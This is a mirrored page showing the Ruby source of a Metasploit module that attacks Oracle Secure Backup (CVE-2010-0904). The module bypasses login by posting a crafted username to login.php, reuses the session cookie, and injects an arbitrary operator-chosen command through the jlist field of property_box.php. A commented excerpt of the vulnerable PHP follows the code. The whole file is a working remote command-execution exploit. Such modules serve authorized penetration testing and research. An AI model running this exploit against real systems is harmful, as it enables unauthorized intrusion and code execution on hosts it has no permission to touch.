Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr3.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
14
'Description' => %q{
15
This module exploits an authentication bypass vulnerability
16
in login.php in order to execute arbitrary code via a command injection
17
vulnerability in property_box.php. This module was tested
18
against Oracle Secure Backup version 10.3.0.1.0 (Win32).
19
},
20
'Author' => [ 'MC' ],
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2010-0904' ],
24
[ 'OSVDB', '66338'],
25
[ 'ZDI', '10-118' ],
26
],
27
'DisclosureDate' => '2010-07-13',
28
'Notes' => {
29
'Stability' => [CRASH_SAFE],
30
'SideEffects' => [IOC_IN_LOGS],
31
'Reliability' => []
32
}
33
)
34
)
35
36
register_options(
37
[
38
Opt::RPORT(443),
39
OptString.new('CMD', [ false, 'The command to execute.', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt' ]),
40
OptBool.new('SSL', [true, 'Use SSL', true]),
41
]
42
)
43
end
44
45
def run
46
cmd = datastore['CMD']
47
48
res = send_request_cgi(
49
{
50
'uri' => '/login.php',
51
'data' => 'attempt=1&uname=-',
52
'method' => 'POST'
53
}, 5
54
)
55
56
if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
57
58
print_status("Sending command: #{datastore['CMD']}...")
59
60
send_request_cgi(
61
{
62
'uri' => '/property_box.php',
63
'data' => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),
64
'cookie' => res.get_cookies,
65
'method' => 'POST'
66
}, 5
67
)
68
69
print_status('Done.')
70
else
71
print_error('Invalid PHPSESSION token..')
72
return
73
end
74
end
75
end
76
=begin
77
else if (strcmp($type, "Job") == 0)
78
{
79
if (!is_array($objectname))
80
$objectname = array();
81
reset($objectname);
82
while (list(,$oname) = each($objectname))
83
{
84
$oname = escapeshellarg($oname);
85
$jlist = "$jlist $oname";
86
}
87
if (strlen($jlist) > 0)
88
$msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
89
=end
90
91